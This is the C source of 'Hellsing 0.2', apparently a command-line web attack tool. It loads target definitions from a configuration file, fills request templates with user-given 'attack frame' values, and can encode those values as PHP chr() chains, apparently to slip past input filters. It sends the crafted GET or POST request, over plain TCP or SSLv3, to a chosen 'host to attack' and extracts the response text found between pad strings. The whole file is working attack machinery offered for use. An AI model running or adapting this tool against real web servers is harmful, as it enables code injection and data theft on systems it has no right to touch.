#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

#include <openssl/bio.h>
#include <openssl/ssl.h>
#include <openssl/err.h>

#include "hellsing.h"

int sock, use_ssl = 0;
char *configfile;

SSL_METHOD *method;
SSL_CTX *ctx;
SSL *ssl = NULL;
X509 *cert;


int main(int argc, char **argv) {
	int ch, sock, index = -1, port = -1, listTargets = 0, lindex = 0;
	char *vhost = NULL, *host = NULL, *path = NULL, *frame = NULL, *encodeRoutine = NULL, *padString = NULL, *useragent = NULL;
	
	if(argc < 2) {
		usage();
		exit(1);
	}
	
	while((ch = getopt(argc, argv, "k:v:t:p:x:c:f:e:s:u:loh")) != -1) {
		switch(ch) {
			case 's':
				padString = malloc(strlen(optarg)+1);
				strcpy(padString, optarg);
			break;
			case 'e':
				encodeRoutine = malloc(strlen(optarg)+1);
				strcpy(encodeRoutine, optarg);
			break;
			case 'k':
				if(!(host = malloc(strlen(optarg)+1))) {
					perror("malloc");
					exit(1);
				}
				strcpy(host, optarg);
			break;
			case 'v':
				if(!(vhost = malloc(strlen(optarg)+1))) {
					perror("malloc");
					exit(1);
				}
				strcpy(vhost, optarg);
			break;
			case 't':
				index = atoi(optarg);
			break;
			case 'p':
				port = atoi(optarg);
			break;
			case 'x':
				if(!(path = malloc(strlen(optarg)+1))) {
					perror("malloc");
					exit(1);
				}
				strcpy(path, optarg);
			break;
			case 'c':
				if(!(configfile = malloc(strlen(optarg)+1))) {
					perror("malloc");
					exit(1);
				}
				strcpy(configfile, optarg);
			break;
			case 'l':
				listTargets++;
			break;
			case 'f':
				if(!(frame = malloc(strlen(optarg)+1))) {
					perror("malloc");
					exit(1);
				}
				strcpy(frame, optarg);
			break;
			case 'o':
				use_ssl++;
			break;
			case 'u':
				if(!(useragent = malloc(strlen(optarg)+1))) {
					perror("malloc");
					exit(1);
				}
				strcpy(useragent, optarg);
			break;
			case 'h':
				usage();
				exit(0);
			break;
		}
	}
		
	if(!configfile) {
		usage();
		printf("\nYou must specify a valid configuration file.\n");
		exit(1);
	}	

	build_targets();
	
	if(listTargets) {
		if(index < 0) {
			for(lindex=0; lindex<=tindex; lindex++) {
				printf("[%d] %s\n", lindex, target[lindex]->name);
			}
		} else {
			{
				int i = 0;
				printf("%s\n", target[index]->name);
				for(i=0; i<strlen(target[index]->name); i++) {
					printf("-");
				}
				printf("\n");
				printf("%s\n\n", target[index]->description);
				
				printf("Attack Options\n--------------\n");
				rewindList();
				while(target[index]->option->next) {
					printf("%s - %s\n", target[index]->option->key, target[index]->option->value);
					target[index]->option = target[index]->option->next;
				}
				printf("%s - %s\n", target[index]->option->key, target[index]->option->value);
				
			}
		}
		exit(0);
	}

	if(index < 0) {
		usage();
		printf("\nYou must specify a valid target.  Use -l to list.\n");
		exit(1);
	}

	if(!host) {
		usage();
		printf("\nYou must specify a valid host.\n");
		exit(1);
	}
	if(!vhost) {
		usage();
		printf("\nYou must specify a valid vhost.\n");
		exit(1);
	}
	if(!path) {
		usage();
		printf("\nYou must specify a valid path.\n");
		exit(1);
	}
	if(!frame) {
		usage();
		printf("\nYou must specify a valid attack frame.\n");
		exit(1);
	}
	
	if(port == -1) {
		if(target[index]->ssl || use_ssl) {
			port = DEFAULT_SSL_PORT;
		} else {
			port = DEFAULT_PORT;
		}
	}

	if((port < 0) || (port > 65535)) {
		usage();
		printf("\nYou must specify a valid port.\n");
		exit(1);
	}

	printf("[target]: %s\n", target[index]->name);
	printf("[host]: %s\n", host);
	printf("[port]: %d\n", port);
	printf("[vhost]: %s\n", vhost);
	printf("[path]: %s\n", path);

	if(useragent) {
		printf("[useragent]: %s\n", useragent);
	}
		
	buildAttackBuffer(index, frame, encodeRoutine);
	
	if((sock = createSocket(index, host, port)) == -1) {
		exit(1);
	}

	sendAttack(index, vhost, path, useragent ? useragent : NULL);
	readResponse(padString, index);
	
	free(host);
	free(vhost);
	free(path);
	
	exit(0);
}


char *buildAttackBuffer(int index, char *frame, char *encodeRoutine) {
	char *p;
	char ch[MAX_ARGUMENTS];
	int i = 0, t = 0;
	
	p = frame;
	while((p = strchr(p, ':'))) {
		p--;
		ch[i++] = p[0];
		p+=2;
	}	

	rewindList();
	while(target[index]->option->next) {
		for(t=0; t<i; t++) {
			if(target[index]->option->key[0] == ch[t]) {
				if(encodeRoutine != NULL) {
					if(encodeRoutine[0] == ch[t]) {
						encodeRoutine = encodeRoutine + 2;
						processFormatString(ch[t], index, frame, target[index]->request_uri, encodeRoutine);
					} else {
						processFormatString(ch[t], index, frame, target[index]->request_uri, NULL);
					}
				} else {
					processFormatString(ch[t], index, frame, target[index]->request_uri, NULL);
				}
			}
		}
		target[index]->option = target[index]->option->next;
	}
	// need to do this for the last target[index]->option
	for(t=0; t<i; t++) {
		if(target[index]->option->key[0] == ch[t]) {
			if(encodeRoutine != NULL) {
				if(encodeRoutine[0] == ch[t]) {
					encodeRoutine = encodeRoutine + 2;
					processFormatString(ch[t], index, frame, target[index]->request_uri, encodeRoutine);
				} else {
					processFormatString(ch[t], index, frame, target[index]->request_uri, NULL);
				}
			} else {
				processFormatString(ch[t], index, frame, target[index]->request_uri, NULL);
			}
		}
	}
	return(NULL);
}


char *processFormatString(char ch, int index, char *frame, char *fmtstr, char *encodeRoutine) {
	char *p, *s, *q, *t;
	char *final;
	char outbuf[MAX_BUF_LEN];
	char qbuf[MAX_BUF_LEN];
	
	p = fmtstr;
	s = p;
		
	while(*p) {
		while((*p != '%') && (*p)) {
			p++;
		}
		p++;
		if(p[0] == ch) {
			p++;
			getReplaceValue(ch, frame, qbuf);
			memset(outbuf, 0, sizeof(outbuf));
			if(encodeRoutine != NULL) {
				if(!strcasecmp(encodeRoutine, "chr")) {
					encodeChr(qbuf, outbuf);
				}
			} else {
				strcpy(outbuf, qbuf);
			}
			final = malloc((p - s) + strlen(outbuf) + strlen(p) + 1);
			memset(final, 0, (p - s) + strlen(outbuf) + strlen(p) + 1);
			// copy first half of string
			t = final;
			while(s < (p-2)) {
				*t++ = *s++;
			}
			*t = 0;

			// copy replaced, and possibly encoded portion of the format string
			strcat(final, outbuf);
			
			// copy the rest of the format string
			q = p;
			t = final + strlen(final);
			while(p < &fmtstr[strlen(fmtstr)]) {
				*t++ = *p++;
			}
			*t = 0;
			
			free(target[index]->request_uri);
			target[index]->request_uri = malloc(strlen(final)+1);
			strcpy(target[index]->request_uri, final);
			free(final);
			p = q++;
		}
	}
	
	return(target[index]->request_uri);
}


char *getReplaceValue(char ch, char *frame, char *qbuf) {
	char *p = frame, *start, *end, *buf;
	
	while((p = strchr(p, ':'))) {
		p--;
		if(p[0] == ch) {
			start = p + 2;
			p+=2;
			while((*p != ';') && (*p)) {
				p++;
			}
			end = p;
			if((end - start) > MAX_BUF_LEN) {
				return(NULL);
			} else {
				buf = malloc((end - start)+1);
				memset(buf, 0, (end - start)+1);
				memcpy(buf, start, (end - start));
				strcat(buf, "\x00");
				strcpy(qbuf, buf);
				return(buf);
			}
		} else {
			p+=2;
		}
	}

	// we should never get here
	return(NULL);
}


int createSocket(int index, char *host, int port) {
    struct hostent *he;
    struct sockaddr_in their_addr;

	if ((he = gethostbyname(host)) == NULL) {			
		herror("gethostbyname");
		return(-1);
	}
	if ((sock = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
		perror("socket");
		return(sock);
    }
	    
	their_addr.sin_family = AF_INET;
	their_addr.sin_port = htons(port);
	their_addr.sin_addr = *((struct in_addr *)he->h_addr);
	memset(&(their_addr.sin_zero), '\0', 8);
		
	if (connect(sock, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) {
		perror("connect");
		return(-1);
	}
	
	if(target[index]->ssl || use_ssl) {
		SSL_library_init();
		SSL_load_error_strings();
		method = SSLv3_client_method();

		if (!(ctx = SSL_CTX_new(method))) {
			fprintf(stderr, "SSL_CTX_new() failed!\n");
			close(sock);
			return(-1);
		}
		if(!(ssl = SSL_new(ctx))) {
			fprintf(stderr, "SSL_new(): %s\n", ERR_reason_error_string(ERR_get_error()));
			close(sock);
			return(-1);
		}
		if(!SSL_set_fd(ssl, sock)) {
			fprintf(stderr, "SSL_set_fd(): %s\n", ERR_reason_error_string(ERR_get_error()));
			close(sock);
			SSL_free(ssl);
			return(-1);
		}
		if(SSL_connect(ssl) <= 0) {
			fprintf(stderr, "SSL_connect(): %s\n", ERR_reason_error_string(ERR_get_error()));
			close(sock);
			SSL_free(ssl);
			return(-1);
		}
		
		printf("[cipher] %s\n", SSL_get_cipher(ssl));

		if(!(cert = SSL_get_peer_certificate(ssl))) {
			fprintf(stderr, "%s:%d did not present a certificate!\n", host, port);
			SSL_shutdown(ssl);
			close(sock);
			SSL_free(ssl);
			return(-1);
		}
		
		printf("[subject] %s\n", X509_NAME_oneline(X509_get_subject_name(cert), 0, 0));
		printf("[issuer] %s\n", X509_NAME_oneline(X509_get_issuer_name(cert), 0, 0));
		
		{
			unsigned int mdsha_size;
			unsigned char mdsha[EVP_MAX_MD_SIZE];
			if(!X509_digest(cert, EVP_md5(), mdsha, &mdsha_size)) {
				fprintf(stderr, "X509_digest\n");
				X509_free(cert);
				SSL_shutdown(ssl);
				close(sock);
				SSL_free(ssl);
				return(-1);
			}
		}
		
		X509_free(cert);
	}
	
	return(0);
}


void sendAttack(int index, char *vhost, char *path, char *useragent) {
	if(target[index]->ssl || use_ssl) {
		if(target[index]->request_method == GET) {
			SSL_write(ssl, "GET ", 4);
			SSL_write(ssl, path, strlen(path));
			SSL_write(ssl, target[index]->request_uri, strlen(target[index]->request_uri));
			SSL_write(ssl, " HTTP/1.1\n", 10);
	
			SSL_write(ssl, "Host: ", 6);
			SSL_write(ssl, vhost, strlen(vhost));
			SSL_write(ssl, "\n", 1);
			
			SSL_write(ssl, "User-Agent: ", 12);
			if(useragent) {
				SSL_write(ssl, useragent, strlen(useragent));
			} else {
				SSL_write(ssl, USER_AGENT, strlen(USER_AGENT));
			}
			SSL_write(ssl, "\n", 1);
			
			SSL_write(ssl, "Accept: ", 8);
			SSL_write(ssl, ACCEPT, strlen(ACCEPT));
			SSL_write(ssl, "\n", 1);
			
			SSL_write(ssl, "Accept-Language: ", 17);
			SSL_write(ssl, ACCEPT_LANGUAGE, strlen(ACCEPT_LANGUAGE));
			SSL_write(ssl, "\n", 1);
			
			SSL_write(ssl, "Accept-Encoding: ", 17);
			SSL_write(ssl, ACCEPT_ENCODING, strlen(ACCEPT_ENCODING));
			SSL_write(ssl, "\n", 1);
			
			SSL_write(ssl, "Accept-Charset: ", 16);
			SSL_write(ssl, ACCEPT_CHARSET, strlen(ACCEPT_CHARSET));
			SSL_write(ssl, "\n", 1);
			
			SSL_write(ssl, "Keep-Alive: ", 12);
			SSL_write(ssl, KEEPALIVE, strlen(KEEPALIVE));
			SSL_write(ssl, "\n", 1);
			
			SSL_write(ssl, "Connection: ", 12);
			SSL_write(ssl, CONNECTION, strlen(CONNECTION));
			SSL_write(ssl, "\n", 1);
			
			if(target[index]->cookie) {
				rewindCookieList();
				SSL_write(ssl, "Cookie:", 7);
				while(target[index]->cookie->next) {
					SSL_write(ssl, " ", 1);
					SSL_write(ssl, target[index]->cookie->name, strlen(target[index]->cookie->name));
					SSL_write(ssl, "=", 1);
					SSL_write(ssl, target[index]->cookie->value, strlen(target[index]->cookie->value));
					SSL_write(ssl, ";", 1);
					target[index]->cookie = target[index]->cookie->next;
				}
				SSL_write(ssl, " ", 1);
				SSL_write(ssl, target[index]->cookie->name, strlen(target[index]->cookie->name));
				SSL_write(ssl, "=", 1);
				SSL_write(ssl, target[index]->cookie->value, strlen(target[index]->cookie->value));
				SSL_write(ssl, ";", 1);
				SSL_write(ssl, "\n", 1);
			}
			
			SSL_write(ssl, "\n\n", 2);
		} else if(target[index]->request_method == POST) {
			SSL_write(ssl, "POST ", 5);
			SSL_write(ssl, path, strlen(path));
			SSL_write(ssl, " HTTP/1.1\n", 10);
	
			SSL_write(ssl, "Host: ", 6);
			SSL_write(ssl, vhost, strlen(vhost));
			SSL_write(ssl, "\n", 1);
			
			SSL_write(ssl, "User-Agent: ", 12);
			if(useragent) {
				SSL_write(ssl, useragent, strlen(useragent));
			} else {
				SSL_write(ssl, USER_AGENT, strlen(USER_AGENT));
			}
			SSL_write(ssl, "\n", 1);
			
			SSL_write(ssl, "Accept: ", 8);
			SSL_write(ssl, ACCEPT, strlen(ACCEPT));
			SSL_write(ssl, "\n", 1);
			
			SSL_write(ssl, "Accept-Language: ", 17);
			SSL_write(ssl, ACCEPT_LANGUAGE, strlen(ACCEPT_LANGUAGE));
			SSL_write(ssl, "\n", 1);
			
			SSL_write(ssl, "Accept-Encoding: ", 17);
			SSL_write(ssl, ACCEPT_ENCODING, strlen(ACCEPT_ENCODING));
			SSL_write(ssl, "\n", 1);
			
			SSL_write(ssl, "Accept-Charset: ", 16);
			SSL_write(ssl, ACCEPT_CHARSET, strlen(ACCEPT_CHARSET));
			SSL_write(ssl, "\n", 1);
			
			SSL_write(ssl, "Keep-Alive: ", 12);
			SSL_write(ssl, KEEPALIVE, strlen(KEEPALIVE));
			SSL_write(ssl, "\n", 1);
			
			SSL_write(ssl, "Connection: ", 12);
			SSL_write(ssl, CONNECTION, strlen(CONNECTION));
			SSL_write(ssl, "\n", 1);
	
			if(target[index]->cookie) {
				rewindCookieList();
				SSL_write(ssl, "Cookie:", 7);
				while(target[index]->cookie->next) {
					SSL_write(ssl, " ", 1);
					SSL_write(ssl, target[index]->cookie->name, strlen(target[index]->cookie->name));
					SSL_write(ssl, "=", 1);
					SSL_write(ssl, target[index]->cookie->value, strlen(target[index]->cookie->value));
					SSL_write(ssl, ";", 1);
					target[index]->cookie = target[index]->cookie->next;
				}
				SSL_write(ssl, " ", 1);
				SSL_write(ssl, target[index]->cookie->name, strlen(target[index]->cookie->name));
				SSL_write(ssl, "=", 1);
				SSL_write(ssl, target[index]->cookie->value, strlen(target[index]->cookie->value));
				SSL_write(ssl, ";", 1);
				SSL_write(ssl, "\n", 1);
			}
	
			SSL_write(ssl, "Content-Type: application/x-www-form-urlencoded\n", 48);		
			{
				char foobuf[16];
	
				SSL_write(ssl, "Content-Length: ", 16);	
				if(target[index]->request_uri[0] == '?') {
					target[index]->request_uri = target[index]->request_uri + 1;
				}
				snprintf(foobuf, 15, "%d", strlen(target[index]->request_uri));
				SSL_write(ssl, foobuf, strlen(foobuf));
				SSL_write(ssl, "\n\n", 2);
			}
	
			SSL_write(ssl, target[index]->request_uri, strlen(target[index]->request_uri));
			SSL_write(ssl, "\n\n", 2);
		}
	} else {
		if(target[index]->request_method == GET) {
			write(sock, "GET ", 4);
			write(sock, path, strlen(path));
			write(sock, target[index]->request_uri, strlen(target[index]->request_uri));
			write(sock, " HTTP/1.1\n", 10);
	
			write(sock, "Host: ", 6);
			write(sock, vhost, strlen(vhost));
			write(sock, "\n", 1);
			
			write(sock, "User-Agent: ", 12);
			if(useragent) {
				write(sock, useragent, strlen(useragent));
			} else {
				write(sock, USER_AGENT, strlen(USER_AGENT));
			}
			write(sock, "\n", 1);
			
			write(sock, "Accept: ", 8);
			write(sock, ACCEPT, strlen(ACCEPT));
			write(sock, "\n", 1);
			
			write(sock, "Accept-Language: ", 17);
			write(sock, ACCEPT_LANGUAGE, strlen(ACCEPT_LANGUAGE));
			write(sock, "\n", 1);
			
			write(sock, "Accept-Encoding: ", 17);
			write(sock, ACCEPT_ENCODING, strlen(ACCEPT_ENCODING));
			write(sock, "\n", 1);
			
			write(sock, "Accept-Charset: ", 16);
			write(sock, ACCEPT_CHARSET, strlen(ACCEPT_CHARSET));
			write(sock, "\n", 1);
			
			write(sock, "Keep-Alive: ", 12);
			write(sock, KEEPALIVE, strlen(KEEPALIVE));
			write(sock, "\n", 1);
			
			write(sock, "Connection: ", 12);
			write(sock, CONNECTION, strlen(CONNECTION));
			write(sock, "\n", 1);
			
			if(target[index]->cookie) {
				rewindCookieList();
				write(sock, "Cookie:", 7);
				while(target[index]->cookie->next) {
					write(sock, " ", 1);
					write(sock, target[index]->cookie->name, strlen(target[index]->cookie->name));
					write(sock, "=", 1);
					write(sock, target[index]->cookie->value, strlen(target[index]->cookie->value));
					write(sock, ";", 1);
					target[index]->cookie = target[index]->cookie->next;
				}
				write(sock, " ", 1);
				write(sock, target[index]->cookie->name, strlen(target[index]->cookie->name));
				write(sock, "=", 1);
				write(sock, target[index]->cookie->value, strlen(target[index]->cookie->value));
				write(sock, ";", 1);
			}
			write(sock, "\n\n", 2);
		} else if(target[index]->request_method == POST) {
			write(sock, "POST ", 5);
			write(sock, path, strlen(path));
			write(sock, " HTTP/1.1\n", 10);
	
			write(sock, "Host: ", 6);
			write(sock, vhost, strlen(vhost));
			write(sock, "\n", 1);
			
			write(sock, "User-Agent: ", 12);
			write(sock, USER_AGENT, strlen(USER_AGENT));
			write(sock, "\n", 1);
			
			write(sock, "Accept: ", 8);
			write(sock, ACCEPT, strlen(ACCEPT));
			write(sock, "\n", 1);
			
			write(sock, "Accept-Language: ", 17);
			write(sock, ACCEPT_LANGUAGE, strlen(ACCEPT_LANGUAGE));
			write(sock, "\n", 1);
			
			write(sock, "Accept-Encoding: ", 17);
			write(sock, ACCEPT_ENCODING, strlen(ACCEPT_ENCODING));
			write(sock, "\n", 1);
			
			write(sock, "Accept-Charset: ", 16);
			write(sock, ACCEPT_CHARSET, strlen(ACCEPT_CHARSET));
			write(sock, "\n", 1);
			
			write(sock, "Keep-Alive: ", 12);
			write(sock, KEEPALIVE, strlen(KEEPALIVE));
			write(sock, "\n", 1);
			
			write(sock, "Connection: ", 12);
			write(sock, CONNECTION, strlen(CONNECTION));
			write(sock, "\n", 1);
	
			if(target[index]->cookie) {
				rewindCookieList();
				write(sock, "Cookie:", 7);
				while(target[index]->cookie->next) {
					write(sock, " ", 1);
					write(sock, target[index]->cookie->name, strlen(target[index]->cookie->name));
					write(sock, "=", 1);
					write(sock, target[index]->cookie->value, strlen(target[index]->cookie->value));
					write(sock, ";", 1);
					target[index]->cookie = target[index]->cookie->next;
				}
				write(sock, " ", 1);
				write(sock, target[index]->cookie->name, strlen(target[index]->cookie->name));
				write(sock, "=", 1);
				write(sock, target[index]->cookie->value, strlen(target[index]->cookie->value));
				write(sock, ";", 1);
				write(sock, "\n", 1);
			}
	
			write(sock, "Content-Type: application/x-www-form-urlencoded\n", 48);		
			{
				char foobuf[16];
	
				write(sock, "Content-Length: ", 16);	
				if(target[index]->request_uri[0] == '?') {
					target[index]->request_uri = target[index]->request_uri + 1;
				}
				snprintf(foobuf, 15, "%d", strlen(target[index]->request_uri));
				write(sock, foobuf, strlen(foobuf));
				write(sock, "\n\n", 2);
			}
	
			write(sock, target[index]->request_uri, strlen(target[index]->request_uri));
			write(sock, "\n\n", 2);
		}
	}
}

void readResponse(char *pstring, int index) {
	char *p, *t;
	char buf[1024];
	int n, pad = 0;
	
	printf("\n");

	if(target[index]->ssl || use_ssl) {
		if(pstring != NULL) {
			while((n = SSL_read(ssl, buf, sizeof(buf))) != 0) {
				int err;
				err = SSL_get_error(ssl, n);
				if (err != SSL_ERROR_WANT_READ) {
					break;
				}

				if(pad == 0) {
					if((p = strstr(buf, pstring))) {
						p += strlen(pstring);
						if((t = strstr(p, pstring))) {
							while(p < t) {
								printf("%c", *p);
								p++;
							}
							return;
						} else {
							printf("%s", p);
							pad++;
						}
					}
				} else {
					p = buf;
					if((t = strstr(buf, pstring))) {
						while(p < t) {
							printf("%c", *p);
							p++;
						}
						return;
					} else {
						printf("%s", buf);
					}
				}
			}
		} else {
			memset(buf, 0, sizeof(buf));
			while((n = SSL_read(ssl, buf, sizeof(buf))) != 0) {
				if(n == -1) {
					perror("read");
					exit(1);
				}
				printf("%s", buf);
				memset(buf, 0, sizeof(buf));
			}
		}
	} else {
		if(pstring != NULL) {
			while((n = read(sock, buf, sizeof(buf))) != 0) {
				if(pad == 0) {
					if((p = strstr(buf, pstring))) {
						p += strlen(pstring);
						if((t = strstr(p, pstring))) {
							while(p < t) {
								printf("%c", *p);
								p++;
							}
							return;
						} else {
							printf("%s", p);
							pad++;
						}
					}
				} else {
					p = buf;
					if((t = strstr(buf, pstring))) {
						while(p < t) {
							printf("%c", *p);
							p++;
						}
						return;
					} else {
						printf("%s", buf);
					}
				}
			}
		} else {
			memset(buf, 0, sizeof(buf));
			while((n = read(sock, buf, sizeof(buf))) != 0) {
				if(n == -1) {
					perror("read");
					exit(1);
				}
				printf("%s", buf);
				memset(buf, 0, sizeof(buf));
			}
		}
	}
			
	printf("\n");
}


void usage() {
	printf("*---------------------------------------------------------------------------*\n");
	printf("| Hellsing 0.2 Usage Information                                            |\n");
	printf("*---------------------------------------------------------------------------*\n");
	printf("| -t <target>	: target to use                                             |\n");
	printf("| -l            : list target when -t is given, otherwise list all targets. |\n");
	printf("| -c <file>     : configuration file to use.                                |\n");
	printf("| -k <host>     : host to attack.                                           |\n");
	printf("| -v <domain>   : virtual host to send.                                     |\n");
	printf("| -p <port>     : port to connect to.                                       |\n");
	printf("| -x <path>     : /path/to/target.                                          |\n");
	printf("| -f <argument> : arguments to target.  see -t <target> -l for specifics.   |\n");
	printf("| -e <routine>  : encoding routine for arguments.                           |\n");
	printf(": -s <string>   : display information between pad string.                   |\n");
	printf("| -o            : enable ssl support.                                       |\n");
	printf("| -u <agent>    : set non default user agent.                               |\n");
	printf("*---------------------------------------------------------------------------*\n");
	printf("| Argument Information                                                      |\n");
	printf("*---------------------------------------------------------------------------*\n");
	printf("| Arguments are specified in the format of <format character>:value.        |\n");
	printf("| Each argument must be spereated by a semi-colon (;).                      |\n");
	printf("| For example, to specify a format of t and s, you would \"t:<val>;s:<val>\"  |\n");
	printf("*---------------------------------------------------------------------------*\n");
	printf("| Encoding Routines                                                         |\n");
	printf("*---------------------------------------------------------------------------*\n");
	printf("| Encoding routines are used to encode the val for the given format char.   |\n");
	printf("| For example, to specify that the argument to the format char c should be  |\n");
	printf("| encoded as chr(<decimal>), you would specify \"c:chr\".                     |\n");
	printf("|                                                                           |\n");
	printf("| Valid Encoding Routines are:                                              |\n");
	printf("|    chr - convert each character to php equiv function of chr(<decimal>).  |\n");
	printf("|          each chr() is concatinated with a period.  ie: chr(12).chr(47)   |\n");
	printf("*---------------------------------------------------------------------------*\n");
	return;
}
